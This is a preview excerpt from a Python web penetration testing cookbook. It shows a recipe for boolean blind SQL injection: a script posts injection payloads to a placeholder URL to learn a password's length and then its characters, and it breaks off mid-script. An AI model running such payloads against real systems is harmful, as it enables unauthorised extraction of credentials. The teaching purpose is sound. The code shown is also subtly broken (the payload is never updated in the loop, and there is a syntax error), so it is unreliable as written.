Book Image

Python Web Penetration Testing Cookbook

By : Benjamin May, Cameron Buchanan, Andrew Mabbitt, Dave Mound, Terry Ip
Book Image

Python Web Penetration Testing Cookbook

By: Benjamin May, Cameron Buchanan, Andrew Mabbitt, Dave Mound, Terry Ip

Overview of this book

Table of Contents (16 chapters)
Python Web Penetration Testing Cookbook
Credits
About the Authors
About the Reviewers
www.PacktPub.com
Preface
Index

Exploiting Boolean SQLi


There are times when all you can get from a page is a yes or no. It's heartbreaking until you realize that that's the SQL equivalent of saying I LOVE YOU. All SQLi can be broken down into yes or no questions, depending on how patient you are.

We will create a script that takes a yes value and a URL and returns results based on a predefined attack string. I have provided an example attack string but this will change, depending on the system you are testing.

How to do it…

The following script is how yours should look:

import requests
import sys

yes = sys.argv[1]

i = 1
asciivalue = 1

answer = []
print “Kicking off the attempt”

payload = {'injection': '\'AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'}

while True:
  req = requests.post('<target url>' data=payload)
  lengthtest = req.text
  if yes in lengthtest:
    length = i
    break
  else:
    i = i+1

for x in range(1, length):
  while asciivalue < 126:
payload = {'injection': '\'AND (substr...